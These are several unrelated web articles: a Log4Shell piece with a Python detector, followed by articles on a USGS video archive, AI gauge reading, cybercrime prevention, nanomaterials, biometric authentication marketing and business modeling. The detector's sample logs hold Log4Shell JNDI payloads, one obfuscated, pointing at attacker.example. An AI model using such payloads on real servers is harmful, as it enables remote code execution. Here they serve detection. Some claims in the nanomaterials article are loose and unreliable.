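def suspicious(line: str) -> bool:
    """Flag log lines that look like Log4Shell exploitation attempts."""
    return bool(PLAIN.search(line) or NESTED.search(line))

sample_log = [
    'GET /index.html 200',
    'User-Agent: ${jndi:ldap://attacker.example/a}',
    'X-Api-Version: ${${lower:j}ndi:ldap://attacker.example/a}',
]
hits = [line for line in sample_log if suspicious(line)]  # flags the last two lines
```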
A third challenge regarding Log4Shell is that it is relatively easy to exploit—in Minecraft it is as simple as typing one line of malicious code into the public chat box. But while exploitation is easy, patching it requires intense, customized effort from cybersecurity experts. The fix depends on how the software is incorporated into the system and can require different plans of action.
Preparing for Future Attacks
The discovery of Log4Shell has left companies and government agencies scrambling to see whether their systems use Log4j and whether they need to be patched. But is there anything we can learn about this vulnerability that can help prepare for future attacks? At this stage of the game, we know that cyberattacks are regular occurrences. The question isn’t “if” another large-scale flaw will be exploited, but “when.”
According to Mark Manglicmot, Vice President of Security Services at Arctic Wolf, the Log4j vulnerability highlights the importance of every company knowing their digital assets. Companies that don’t know what they have will be left playing catch-up when the next big attack hits. Those that are aware of their digital assets will be able to mitigate the damage more quickly. | <urn:uuid:397320a6-d2cc-444a-ac80-7bcb27b3453d> | CC-MAIN-2024-38 | https://www.interforinternational.com/the-far-ranging-and-terrifying-implications-of-log4j/ | 2024-09-07T13:31:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00087.warc.gz | en | 0.94222 | 778 | 3.25 | 3 |
U.S. Geological Survey Builds Video Archive with Convera
The U.S. Geological Survey (USGS) has selected Convera to supply digital content management solutions for its archive of scientific video.
The USGS will use the Convera Screening Room to capture, archive and manage its collection of video products and b-roll footage, creating an archive of material that can be published to the Internet. The footage, captured by USGS researchers, documents significant biological, hydrological and geological occurrences, such as natural disasters. The system will be installed at the USGS' Earth Resources Observation Systems Data Center (EDC), home to the world's largest collection of satellite images and aerial photographs of the Earth's landmasses.
"Sharing USGS video assets with educators, scientists and other interested individuals over the Web gives us an extraordinary new capability for providing the nation with reliable scientific information about the Earth," says Kevin Laurent, Senior Computer Scientist, USGS. "With Convera Screening Room, we will be able to capture, search for and publish video footage to the Web on topics, such as earthquakes, volcanoes, floods, coastal erosion and wildlife disease. This new capacity allows us to more effectively get visual data into the hands of researchers and the media."
Convera Screening Room provides scalable, high-performance access to any video asset (analog or digital) from an ordinary Web browser. With Screening Room, users can automatically capture video; browse visual summaries (called "storyboards"); catalog content using metadata, annotations, closed caption text, and voice sound tracks; search for precise video clips using text and image clues; create rough cuts and "Edit Decision Lists" for further production; and publish those video assets to the Web for streaming.
For more information, visit www.usgs.gov, or www.convera.com | <urn:uuid:f92281e9-03df-47e6-8220-71baa723293c> | CC-MAIN-2024-38 | https://esj.com/articles/2001/03/27/us-geological-survey-builds-video-archive-with-convera.aspx | 2024-09-09T22:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00787.warc.gz | en | 0.869887 | 387 | 2.640625 | 3 |
Nowadays, AI visual inspection is widely used for defect detection and quality control. AI-based solutions that identify and analyze quality issues enable preventive maintenance and cut overhead expenses for business owners.
How does AI visual inspection apply to analog gauges? One needs to read and verify analog gauges to spot errors caused by drift, the environment, the electrical supply, and so on.
In order to read information from the analog gauge, we need to do two things:
- Detect the bounding box of the analog gauge in the picture
- Read values from the analog gauge.
Since reading gauges manually is a tedious and time-consuming task, automation seems like a plan. AI offers an automatic reading approach that simplifies the procedure, allows anomalies to be detected, and helps prevent production line stoppages.
Visual Inspection: Object Detection
The most efficient way to detect objects in an image today is an approach based on convolutional neural networks. In general, the problem of object detection can be considered solved: if you have a sufficiently large and sufficiently diverse dataset, there is no problem training an object detection model. Let’s take a quick look at what a complete learning process usually looks like. Typically, the process includes the following steps:
- Unlabeled data preparation
- Dataset labeling
- Model Training
At each of these steps, there are many options for what tools to use to complete it, let’s dwell on each in more detail.
Unlabeled data preparation, at its best, assumes that data in your company came about in some natural way. For example, your company is engaged in AI-driven inspection and you already have many analog gauge images from practice, perhaps even computer vision predictive maintenance solutions. If there is no data, you can always try to buy it from companies that hold such data or from companies that specialize in dataset labeling. There are other ways as well, better suited to collecting data for a POC, such as gathering data through crowdsourcing or using utilities like google-images-download.
As for training the model, although this is not the most trivial task, a large number of frameworks are available and many tutorials have already been written on how to use them. This is a big topic, so here are just some of the tools you can use during this step: mmdetection, detectron2, the TensorFlow Object Detection API, etc. These frameworks allow you to choose the right balance of processing speed and accuracy by providing different backbones, including configurations that allow you to work in real time.
The second task, reading values from the gauge, cannot yet be called solved. Let’s take a look at several options for how to do this.
Classical Computer Vision Approach
Let’s start with the classic approach. It essentially consists of two algorithms:
- Circles detection
- Lines detection
Then, having the circle, the position of the needle, and the model of the analog gauge, we can accurately determine the value the needle points to.
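The final geometric step, going from a detected circle center and needle tip to a reading, is plain trigonometry. The sketch below assumes the positions of the min and max scale marks are known for the gauge model; all coordinates are in image space, and the example gauge geometry is invented.

```python
import math

def clockwise_angle(center, point):
    """Angle of `point` around `center`, in degrees, measured clockwise from the
    positive x-axis (image coordinates have y growing downward, so atan2(dy, dx)
    already increases clockwise on screen)."""
    dx = point[0] - center[0]
    dy = point[1] - center[1]
    return math.degrees(math.atan2(dy, dx)) % 360.0

def gauge_value(center, needle_tip, min_mark, max_mark, min_val, max_val):
    """Map the detected needle direction to a reading by linear interpolation
    between the min and max scale marks."""
    a_needle = clockwise_angle(center, needle_tip)
    a_min = clockwise_angle(center, min_mark)
    a_max = clockwise_angle(center, max_mark)
    sweep = (a_max - a_min) % 360.0      # clockwise sweep of the whole scale
    travel = (a_needle - a_min) % 360.0  # needle's clockwise travel from the min mark
    return min_val + (travel / sweep) * (max_val - min_val)

# Needle pointing straight up on a symmetric 0-10 dial reads mid-scale:
value = gauge_value((128, 128), (128, 40), (50, 190), (206, 190), 0.0, 10.0)  # -> 5.0
```

In practice the center comes from circle detection and the tip from line detection, but the angle-to-value mapping stays the same.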
The bad thing about classical methods, however, is that they are not robust. Problems can arise from unusual or strong lighting, dirt, the specific shapes of the analog dials, and many other things. In any case, it is impossible to predict everything, and often, for the most unusual reasons, something may go wrong. Here are some examples:
In one example, the circle was detected incorrectly. In another, the needle was detected from the opposite side, which may well be considered a false positive.
In addition to these errors, of course, the most frequent ones are when not a single circle or line was detected. For each specific picture, this can be corrected so that the algorithm works, but in the general case, it is impossible to foresee all the options. It is instability that makes the use of classical computer vision algorithms niche. This approach only works if you are completely confident in your data and that it will never change, and if it does, then within some reasonable limits. Therefore, for cases where the data may change significantly, other approaches are required.
AI-Based Visual Inspection
The advantage of deep learning and AI algorithms for predictive maintenance is that they are usually much more robust. This is achieved due to the fact that during the training of the algorithm, the model learns from the dataset all the variety of possible options that are there, and in the end, it turns out that the model learns to recognize key features, ignoring things like lighting, dirt, etc. Of course, it is possible only if the data is diverse enough.
There are several options for solving this problem using neural networks. For example, a keypoint-detection-based approach, where you train the model to detect the center of the circle and the end of the needle. Knowing these, we can find the angle at which the needle is turned and, knowing the analog gauge model, determine what value the needle shows.
Another option is to detect only the needle itself and infer the center: because an analog gauge always has the shape of an ellipse, it is symmetrical, and since we already detected the gauge at the first stage, we can assume the center of the dial lies at the center of the object detected there. This option seems less accurate, but such a model is easier to train.
The third option is to segment the dial and then try to predict the angle of rotation of the needle. This option has been discussed in detail elsewhere, and there are many tricks for improving its efficiency; in short, its advantage is that the training data can be generated artificially by taking examples of empty dials and rotating the needle synthetically.
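The coordinate side of that artificial data generation can be sketched as follows: rotate a canonical needle position about the dial center by a random angle and record the corresponding ground-truth value. In a real pipeline the needle sprite would also be composited onto the empty dial image at the same angle; the gauge geometry used here is invented for illustration.

```python
import math
import random

random.seed(1)

def rotate(point, center, angle_deg):
    """Rotate `point` about `center` by `angle_deg` degrees (standard 2-D rotation)."""
    dx, dy = point[0] - center[0], point[1] - center[1]
    a = math.radians(angle_deg)
    return (center[0] + dx * math.cos(a) - dy * math.sin(a),
            center[1] + dx * math.sin(a) + dy * math.cos(a))

def make_training_pairs(n, center=(100.0, 100.0), needle_tip=(100.0, 40.0),
                        sweep_deg=270.0, min_val=0.0, max_val=10.0):
    """Each sample pairs a rotated needle-tip position with its ground-truth value."""
    pairs = []
    for _ in range(n):
        angle = random.uniform(0.0, sweep_deg)
        value = min_val + (angle / sweep_deg) * (max_val - min_val)
        pairs.append((rotate(needle_tip, center, angle), value))
    return pairs

pairs = make_training_pairs(100)
```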
But, as noted above, all variants based on CNN have a significant disadvantage – they require data and labels.
Using of OCR
We have not yet mentioned the fact that different sensors have different scales. This problem can be solved, for example, with the help of OCR. Even though not all values can be recognized, once the circle has been restored, this machine learning technology makes it possible to recover the values on the scale. One readily available option is the OCR capability of the Google Vision API within the Google Cloud ecosystem.
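Once OCR has recovered even a few (angle, value) pairs from the scale, the angle-to-value mapping can be estimated without knowing the gauge model in advance. A minimal sketch, assuming the scale is linear in angle (the tick data below is invented):

```python
def fit_scale(readings):
    """Least-squares fit of value = slope * angle + intercept from OCR-recovered
    (angle_deg, value) pairs, so the scale need not be known in advance."""
    n = len(readings)
    mean_a = sum(a for a, _ in readings) / n
    mean_v = sum(v for _, v in readings) / n
    cov = sum((a - mean_a) * (v - mean_v) for a, v in readings)
    var = sum((a - mean_a) ** 2 for a, _ in readings)
    slope = cov / var
    return slope, mean_v - slope * mean_a

def read_gauge(needle_angle_deg, readings):
    """Convert a detected needle angle to a value using the fitted scale."""
    slope, intercept = fit_scale(readings)
    return slope * needle_angle_deg + intercept

# Suppose OCR recognized four tick labels around the dial:
ticks = [(0.0, 0.0), (90.0, 30.0), (180.0, 60.0), (270.0, 90.0)]
reading = read_gauge(135.0, ticks)  # -> 45.0
```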
Why Build an AI Visual Inspection System? The Takeaway
Analog gauge recognition is only one example of how you can automate visual inspection. Using data science, and especially deep learning, it looks possible to build an almost fully automated visual inspection system. At the very least, it is definitely possible to remove the most annoying and routine visual checks that humans do manually. And although this will not help in rare cases with specific gauges, or where deep expertise is required, AI-driven inspection can still significantly reduce costs for many manufacturers.
Have a project related to analog recognition? Want to use AI for predictive maintenance? Get help from a team of skilled AI architects and engineers. | <urn:uuid:ea711d11-c5e2-4789-863c-63075e081b56> | CC-MAIN-2024-38 | https://indatalabs.com/blog/ai-inspection | 2024-09-14T20:20:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00387.warc.gz | en | 0.943121 | 1,456 | 2.546875 | 3 |
In the dangerous realms of the cyber universe, how can one stay truly safe and secure? In our previous article, we covered some of the most significant types of cybercrimes, their purposes, and the methods that most cybercriminals use. Now that we understand the threat cybercrimes represent and are aware of the variety of dangers, it is time for preparations. The question is, how? What precautions should we take in order to protect our computers and personal data against cybercrime? Here are three comprehensive ways to protect yourself from cybercrime.
Increasing Public Awareness On How to Protect against Cybercrime
Even in 2020, a year that forced everyone to use the internet and computers for fulfilling the needs of their daily life, a large portion of the population is unaware of the dangers that can threaten their lives. People are not educated about cybercrimes and the way these scams work; therefore, they do not know how to prevent them. After all, as we mentioned before, most hackers use lies and manipulations in order to find their way into the computer systems of companies and individuals.
The sad truth is that many of these cybercriminals are not even experts or masterminds; yet, lack of awareness makes most people an easy target for anyone with a little knowledge of hacking. For instance, many people still tend to open a phishing email message and hence jeopardizing their private data. Human error is a leading cause of many cybercrimes and we must start increasing public awareness and educate them about different types of cybercrimes, the ways they are committed, and how we can prevent them from happening.
Taking Personal Precautions
There are certain precautions that every user should take while surfing on the internet; whether they are using their laptop, smartphone, or office computers. While these precautions are pretty simple and easy to follow, not regarding them can lead to regrettable outcomes.
Use strong passwords. The first step of securing your accounts is probably choosing a strong password. Try to choose a password that is not similar to your name, phone number, or date of birth which are obviously shared with everyone. It is recommended that the password you create would have at least 12 characters and be a mix of capital letters, lower-case letters, numbers, and symbols in order to become much harder to crack. Also, avoid using the same password for all of your accounts. This way, in case someone hacked your password in one website, they would not gain access to all of your accounts.
Avoid suspicious URLs. Always pay attention to the URL addresses you click on and check whether they look legitimate. Fake pages often look exactly like the main websites; so never forget to double-check their exact address carefully. Avoid clicking on links with unfamiliar or suspicious-looking URLs. Always double-check the URL before signing into your account, making transactions, or adding your personal data on a website. If your internet security product includes functionality to secure online transactions, do not forget to enable it before carrying out any financial transactions.
Never download or open file attachments from spam emails or unknown senders. Always check the senders’ email addresses before opening their message and more importantly, before downloading any attachments. Even if the sender’s name looks familiar and it seems like it was sent from a person you know, always double-check the email address to see if it matches with the real email address. One of the most common ways for viruses and malware to find their way into victims’ computers has always been through email attachments; so never open the attachments in messages from unknown senders or spam emails.
Never click on links in spam emails or untrusted websites.
Like email file attachments, always avoid clicking on links in spam emails, messages from unknown people, or even websites. Most of the links provided from suspicious websites contain malware and can threaten your online safety.
Never share your personal information unless you are absolutely sure about the security.
Whether it is on a website, email, or even over phone calls, never ever share your personal information unless you are absolutely sure about both the identity of that person and the security of the platform. Pretty much like how you do not share your information with just anyone in the streets, you should also avoid giving out your private data to unknown people and websites on the internet. Naturally, when it comes to more sensitive information such as passwords and security data, you just do not share anything with anyone, even if that person claims to be from a company’s security team.
Keep your software apps and operating systems updated.
Companies keep updating their software programs not just to add new features, but also to fix the holes and flaws in the security system of their apps. So keeping your software and more importantly, operating systems up to date, ensures that you benefit from the most recent security patches to protect your information.
Do not trust anyone who claims to be from a company or bank
Whenever you received an email message from a company, check their address and make sure it is the official email of that company rather than a scam. Even when someone calls your phone and claims that they are from a company, hang up; and then call the number on their official website to make sure that you are speaking to them, not a cybercriminal. You can even contact the company with a different phone since some cybercriminals can hold the line open.
Beware of public Wi-Fi risks.
The security of public Wi-Fi can leave you vulnerable to many different types of cybercrimes. In order to stay clear of potential cyber-attacks, it is recommended to use the most updated software and avoid using password-protected websites that contain personal information while you are on public Wi-Fi. Apart from these, another secure way is to use a Virtual Private Network (VPN). VPNs are designed to create a secure network in which all data sent over a Wi-Fi connection is encrypted.
Use Of Cyber Security
While preventing typical human errors can remove a high percentage of cybercrime possibility, having a fully secured computer or network requires the assistance of proper software; which brings us to Cyber Security.
Cyber Security, which is sometimes referred to by other names such as IT security or computer security, is the body of technologies and processes designed to protect computer systems, networks, and devices from cybercrimes or damage to their hardware, software, or electronic data, as well as from the disruption or misdirection of the services they provide. In order to truly keep personal and business networks and devices safe from unauthorized access or malicious attacks, it is essential to use a number of different types of Cyber Security, such as Antivirus Software, Internet Security, or Endpoint Security.
The first big smart step in securing your computer and network devices is probably installing proper anti-virus software on them; whether it is a personal laptop or a work-related device. Antivirus software programs are designed to scan the data on computers in order to detect dangerous software, and then remove any threats before they start causing problems. Anti-Virus also scans incoming files and codes that are being passed through your network traffic. Having this protection in place helps you protect your computer and data against various types of cybercrimes. Just make sure to always keep your anti-virus software program updated so that you would benefit from the latest protection advances.
But how do they work?
How do these anti-virus programs detect malware? Well, the developers of antivirus software programs compile an extensive database of already known viruses, worms, and malware and then teach the software how to detect and remove them. So when different files, apps, and software programs are moving in and out of your system, the antivirus compares them with its database and tries to find matches. The files that are similar or identical to the database will be deleted. This is why keeping an antivirus program updated is important; cause many of these updates, add more data to the database of known malware and viruses.
Another interesting fact about antivirus software programs is that their settings are adjustable as they are programmed to work both automatically and manually. Almost every anti-virus program scans the computer for malicious files automatically but you can also have them do a manual scan as well. In manual scans, you can just sit and see in real-time which malicious files were found and neutralized. You can also choose whether the antivirus program should remove harmful files automatically or ask your permission before cleaning them. Antivirus software programs usually run in the background and check every file that is opened to prevent the system from becoming infected.
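The database comparison described above can be illustrated with a toy signature scanner that matches whole-file hashes against a set of known-bad digests. Real engines also use partial signatures, heuristics, and behavioral analysis; the payload bytes here are invented for the example.

```python
import hashlib

# Toy "signature database": SHA-256 digests of known-malicious files.
KNOWN_BAD = {hashlib.sha256(b"malicious-payload-example").hexdigest()}

def scan(data: bytes) -> bool:
    """Return True if `data` matches a known-bad signature."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD
```

Keeping the signature database updated is exactly what antivirus updates do: each update adds digests and patterns for newly discovered malware.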
Internet Security is another type of Cyber Security that focuses on online threats on the World Wide Web. As we explained in our previous article, most cybercriminals break into people’s computers throughout the internet; and that makes the job of Internet Security even more significant. The objective of Internet Security is to establish rules and measures to use against attacks over the Internet to ensure the security of networks. In the process, internet security prevents attacks targeted at browsers, networks, operating systems, and other applications.
Many methods are used to protect the transfer of data, including encryption and from-the-ground-up engineering. Some of the most common and significant among them are Firewalls, Access Controls, Data Loss Prevention (DLP), Distributed Denial-of-Service Prevention, and Email Security.
As you already know, email messages are where most cybercrimes occur; they open doors for viruses, worms, Trojans, and other types of malware to enter computer systems. That is why establishing comprehensive, multi-layered email security to reduce exposure to emerging threats is essential. Apart from that, email messages should be secured using cryptography, such as signing an email, encrypting the body of a message, and encrypting the communication between mail servers. Last but not least, requiring at least two factors of authentication for accessing email accounts and websites is a great security addition.
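The idea of signing a message so the receiver can detect tampering can be illustrated with a symmetric MAC. Note that real email signing uses public-key schemes such as S/MIME or PGP rather than a shared secret; the sketch below only demonstrates the integrity-check principle, and the key is a placeholder.

```python
import hashlib
import hmac

SECRET_KEY = b"placeholder-shared-secret"  # placeholder; never hard-code real keys

def sign(message: bytes) -> str:
    """Produce a SHA-256 HMAC tag for the message."""
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()

def verify(message: bytes, tag: str) -> bool:
    """Constant-time check that the tag matches the message."""
    return hmac.compare_digest(sign(message), tag)

tag = sign(b"Quarterly report attached.")
```

If even one byte of the message changes in transit, verification fails.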
Another good method of securing networks is using a Firewall system. Firewalls act as filters that control access between networks and protect devices by allowing or denying access to a network. In other words, a Firewall, as its name suggests, is like a wall that keeps harmful files away and prevents malevolent codes from being embedded onto networks. Apart from that, Firewalls can also block dangerous traffic by screening network traffic.
How do they work?
Firewalls consist of various types of filters and gateways that impose restrictions on incoming and outgoing network packets to and from private networks. Any traffic that either enters or exits must pass through the firewall. With a specific set of rules designed into a firewall for identifying dangerous traffic, only authorized traffic is able to pass through. Firewalls also create checkpoints between an internal private network and the public internet, and can limit network exposure by hiding the internal network system and its information from the public internet.
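The rule-based filtering described above can be sketched as a first-match-wins rule table with a default deny. The addresses, ports, and rule format are invented for the example:

```python
# Each rule: (action, required_source_prefix, destination_port or None for any).
# First matching rule wins; anything unmatched is denied.
RULES = [
    ("allow", "10.0.", 443),   # internal clients may reach HTTPS services
    ("allow", "10.0.", 22),    # internal clients may reach SSH
    ("deny",  "",      None),  # everything else is blocked
]

def filter_packet(src_ip: str, dst_port: int) -> str:
    """Return 'allow' or 'deny' for a packet, per the rule table."""
    for action, prefix, port in RULES:
        if src_ip.startswith(prefix) and (port is None or port == dst_port):
            return action
    return "deny"  # default deny if no rule matched
```

Production firewalls match on far more fields (protocol, direction, connection state), but the screening principle is the same.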
Endpoint Security refers to a software approach for ensuring that all the endpoint devices, or end-user devices, in a network maintain certain levels of safety and security. Endpoint devices are systems such as computers, smartphones, tablets, or even scanners that are connected to a network by the internet. All of which serve as points of access to an enterprise network, and create attack paths and points of entry that can be exploited by malicious files. Therefore, Endpoint Security aims to secure every endpoint and tries to make sure that these devices follow a definite level of compliance to standards in order to avoid potential threats.
Endpoint Security is especially effective and beneficial for companies, whether they are small local businesses or huge multinational corporations. In a company network, anything that employees use to communicate with one another and share data can be vulnerable. However, Endpoint Security helps identify and manage users' computer and data access over a corporate network. With Endpoint Security, the network administrator can restrict the use of sensitive data, as well as access to certain websites, for specific users in order to maintain compliance with the organization's policies and standards. In addition, encrypting data on endpoints and removable storage devices is very useful in preventing data leaks.
Worst Case Scenario
In the worst-case scenario, when everything has failed and you become the victim of a cybercrime, noticing the breach and reporting it quickly is very important. Keep an eye on your bank statements and check all of your accounts' transactions. Companies should run regular checkups and use proper tools in order to spot any cybercrime that has occurred faster.
The Health Effects of Nanomaterials: The march of progress continues to bring interesting insights as newer and newer fields of science are discovered, many of which boast broad applications in our daily lives, even in the field of healing. The prospect of re-engineering and controlling every aspect of mankind, right down to our genes, is tempting. Tempting as it may be, though, the use of Nanomaterials raises serious ethical and environmental issues that must be dealt with first. So what are the pros and cons of using Nanomaterials in the health industry? Here are a few listed below:
- Drug delivery:
The method of delivering drugs to patients will be revolutionized by the use of Nanomaterials. Not only will treatment become more targeted and efficient, it will also be much quicker and often lifesaving. Nanomaterials also minimize the risks associated with drug delivery and allow the dosage to be decreased, which is especially valuable for drugs that have significant side effects of their own. In other words, Nanomaterials, and more specifically nanoparticles, are poised to change the face of medicine as we know it, for the better.
- Molecular Imaging:
Molecular imaging is an important discipline in biology, on which the detection and diagnosis of hard-to-catch diseases hinges; it can often mean the difference between life and death for a patient. After all, molecular reactions are often the first indicators of disease. Conventionally, fluorescent probes are used for molecular imaging because of their inherent inertness: aside from the organic dyes that mark the site of cellular change, the marker itself does not react at all and hence will not aggravate any malignant change in the cellular or molecular structure.
- Severe cardiovascular and pulmonary effects:
It’s no secret that ever since the Industrial Revolution, the presence of nanoparticles in the air has posed a significant danger to human health, and as industry has progressed, the risk has only increased. The presence of higher amounts of lead in the air alone causes so many respiratory problems and cardiovascular diseases that it is truly alarming.
- Ethical boundaries:
While Nanomaterials have a significant positive impact on the health industry, any technology used unethically becomes harmful and often dangerous. The regulation of Nanomaterials is important, but there is only so much any regulation can control.
The use of Nanomaterials can be a boon or a curse depending on your viewpoint. Considering their potential, it would be a mistake to ignore them entirely. So of course we should regulate Nanomaterials, but not dismiss them altogether.
Using Biometrics in Security: Pros & Cons
Biometrics may sound like a new type of technology, but it has actually been around for decades and for a good reason—biometrics are hard to hack.
Why are biometrics used for security? Biometrics are used in security because they are always with you, and they are difficult to steal or replicate. This creates a much stronger security system for any organization’s network.
What Are Biometrics?
Biometric authentication, often referred to as “biometrics,” uses physical characteristics from a user as a credential for secure authentication and identity verification. Unlike other forms of authentication (like passwords or tokens), biometrics rely on essentially immutable, unique facets of a physical user to strengthen security by requiring both a strong form of verification and the physical presence of the user at the point of collection.
Generally speaking, there are three types of biometric security:
- Biological: These types use data from individuals at the molecular level, including DNA, blood samples, or other materials. These are incredibly difficult to collect without special facilities.
- Morphological: These are physical structures on the body, including traits like eyes, faces, fingerprints, and so on. These are often the most common authentication used in business and consumer systems.
- Behavioral: These biometrics use tics, patterns, and behaviors to determine identity. Behavioral authentication can include typing analysis, speech analysis, gait analysis, and so on. While these are becoming a more common form of authentication, behaviors are, strictly speaking, one of the easier forms of authentication to fake.
In order to be useful, a biometric marker must be unique (either absolutely or nearly so) to every user while also being feasible to collect. Therefore, standard forms of biometric authentication include the following:
- Fingerprints: Many mobile devices, from tablets to smartphones, already come with fingerprint scanners that can read this form of biometric. Fingerprint scanners are relatively easy to implement and have become a common form of authentication for access to physical devices and as part of multi-factor authentication solutions.
- Facial Scans: Modern iPhones and many laptops have migrated to facial scans. An embedded camera will take a facial picture or video as input and compare it against unique scanning information.
- Iris Scans: Much like fingerprints and faces, the human iris is seen as a secure and unique form of biometric authentication. More modern applications are looking at iris scanning (if they haven’t already implemented it) because it works with the same technology that a facial scan does—a camera or other sensor.
- Voice Recognition: Voice authentication was often considered unsuitable for verification because it was relatively easy to fake. However, a few years and innovations later, voice is seen as a viable and useful form of biometric authentication.
Outside of these common types, there are others that, while useful, are used less, or in unique circumstances:
- Gait Recognition: Machines can analyze gait style to determine user identity. Deploying this kind of biometric authentication is rather difficult in any situation unless using video cameras in a public space.
- Blood and DNA: DNA and blood samples are, almost exclusively, seen as private health information, and outside of particular health considerations, criminal investigations, or the highest levels of security, DNA isn’t seen as a viable, or even necessary, form of biometric identification.
What Are the Components of a Biometric Security System?
The components of a biometrics system are similar to other authentication systems, with the added hardware and software for processing biometric data.
The following are typical components of a biometric system:
- Input Sensors: To collect and compare biometric data, hardware must be in place to gather that data. In the earliest days of bio-authentication, one of the biggest limiters against adoption was the availability of collection devices. Still, the explosion of mobile devices and affordable hardware has changed that reality drastically.
Input sensors will vary based on the type of biometric authentication. Fingerprint scanners, for example, are almost always embedded into hardware as a distinct finger pad that can read that information. Facial and iris scanners leverage the availability of cameras in devices to take physical images of these body parts.
- Processing Units: While data processing is a prominent part of any authentication system, biometrics require special software to complement the hardware and the stored biometric data. The processing component will take the raw physical data provided through the sensor, extract the notable characteristics of that data and, depending on the type deployed, turn it into computer-readable data that can compare against data stored in a database.
- Storage: Biometric data is stored as a “biometric template.” Rather than store a raw picture of, say, a fingerprint (a clear privacy and compliance problem), the system will translate traits into machine data and use it as a template to compare against the physical input provided.
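Template comparison can be sketched at a high level. The tiny four-dimensional "feature vectors" and the 0.95 similarity threshold below are assumptions for illustration only; real systems extract hundreds of features and tune thresholds carefully. The key idea is that biometric readings are never bit-identical between scans, so matching is a similarity score against a threshold rather than an equality check.

```python
# Illustrative sketch of template-based biometric matching.
# Feature vectors and threshold are toy values, not real biometric data.

import math

def cosine_similarity(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

def matches_template(stored_template, live_sample, threshold=0.95):
    # Two scans of the same trait are similar but never identical,
    # so we compare against a threshold instead of testing equality.
    return cosine_similarity(stored_template, live_sample) >= threshold

enrolled = [0.12, 0.87, 0.44, 0.31]        # template stored at enrollment
scan_same_user = [0.13, 0.85, 0.46, 0.30]  # a slightly different reading
scan_other_user = [0.91, 0.05, 0.22, 0.78]

print(matches_template(enrolled, scan_same_user))   # True
print(matches_template(enrolled, scan_other_user))  # False
```

Because only the derived template is stored, a stolen database does not directly yield raw fingerprint or face images, which is part of why hacked biometric data is hard to use meaningfully.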
While these systems can be hacked, it is prohibitively difficult to use hacked biometrics in any meaningful way.
Are Modern Biometrics Reliable?
The short answer is yes.
Not all forms are created equal, and no security system is 100% effective. However, biometrics offer higher levels of security that are otherwise not available through several features and mechanisms:
- Immutable Identification: Most usable biometrics (e.g., fingerprints and iris scans) are unique to the user. As such, it’s difficult to fake access to a system and much easier to ensure that the user accessing an account or resource is who they say they are.
- Complex MFA: Biometrics, combined with SMS or email-based tokens or passwords, can serve as part of a robust MFA system that helps secure accounts and make them harder to hack through traditional means (e.g., password cracking, database hacks, phishing, etc.).
- Convenience: Biometrics are easy to implement. User experience is often a barrier to good security practices (see poor or shared passwords), and biometrics can mitigate that problem.
- Passwordless Authentication: Biometrics can also serve as the foundation for a biometric password or, ultimately, a passwordless system where users do not have to create, remember, or manage a password to use a system—all without sacrificing security.
However, these truisms aren’t expected to hold forever, and even the strongest biometrics won’t eliminate the potential for credential spoofing. Even now, there have been instances of hackers spoofing fingerprints, voice analysis, and facial scans with hacked data. The future of this authentication will expand these services into advanced biometrics like identity proofing and liveness tests.
1Kosmos: Advanced Biometrics and Passwordless Security
Most compliance and security standards will require, at minimum, some form of MFA that includes biometric security. However, as attacks and vulnerabilities evolve, this too will require additional security factors to guarantee the user is who they say they are at the time of authentication. This involves a system that can prove and manage identity while streamlining biometrics in a compliant and user-friendly system.
This is 1Kosmos. The 1Kosmos BlockID system brings advanced biometrics, distributed identity management, and simple user onboarding to enterprise organizations worldwide. The BlockID solution supports advanced authentication and compliance with the following features:
- Identity Proofing: BlockID includes Identity Assurance Level 2 (NIST 800-63A IAL2), detects fraudulent or duplicate identities, and establishes or reestablishes credential verification.
- Identity-Based Authentication Orchestration: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through identity credential triangulation and validation.
- Integration with Secure MFA: BlockID readily integrates with a standard-based API to operating systems, applications, and MFA infrastructure at AAL2. BlockID is also FIDO2 certified, protecting against attacks that attempt to circumvent multi-factor authentication.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API, including private blockchains.
- Privacy by Design: 1Kosmos protects personally identifiable information in a private blockchain and encrypts digital identities in secure enclaves only accessible through advanced biometric verification.
If you’re ready to learn more about biometrics and passwordless authentication, watch the webinar The Journey to Passwordless with 1Kosmos and Ed Amoroso of TAG Cyber. Also, make sure to sign up for the 1Kosmos newsletter to learn more about our products, services, and events. | <urn:uuid:67e58db8-4d25-4b27-ae79-33b32f20f401> | CC-MAIN-2024-38 | https://www.1kosmos.com/biometric-authentication/biometrics-security/ | 2024-09-17T09:27:06Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00187.warc.gz | en | 0.924795 | 1,824 | 2.625 | 3 |
In today's rapidly changing business landscape, organizations need to be able to adapt quickly and effectively to new challenges and opportunities. xMBL, or eXtended Business Modeling Language, is a powerful tool that can help businesses do just that.
xMBL is a visual modeling language that enables businesses to represent their processes, data, and organizational structure in a clear and concise way. This makes it easier for stakeholders to understand and collaborate on business transformation initiatives.
Here are some of the key benefits of using xMBL:
- Enhanced decision-making: xMBL provides a comprehensive and accurate representation of business processes, which can help businesses make data-driven decisions. By modeling various scenarios, businesses can assess potential risks, optimize processes, and identify growth opportunities.
- Agility and adaptability: xMBL is a flexible and adaptable language that can be used to model a wide range of business processes. This makes it ideal for businesses that need to be able to quickly adapt to change.
- Cross-functional collaboration: xMBL provides a common visual language that can be used by stakeholders from across the organization. This can help to break down silos and improve communication, leading to better decision-making and collaboration.
- Digital transformation enabler: xMBL can be used to model the impact of digital technologies on business processes. This can help businesses to identify areas where they can improve their operations and achieve their digital transformation goals.
There are a number of potential applications for xMBL, including:
- Business process optimization: xMBL can be used to identify and eliminate bottlenecks in business processes, leading to increased efficiency and productivity.
- Risk management: xMBL can be used to model potential risks and develop mitigation strategies. This can help businesses to reduce the impact of negative events.
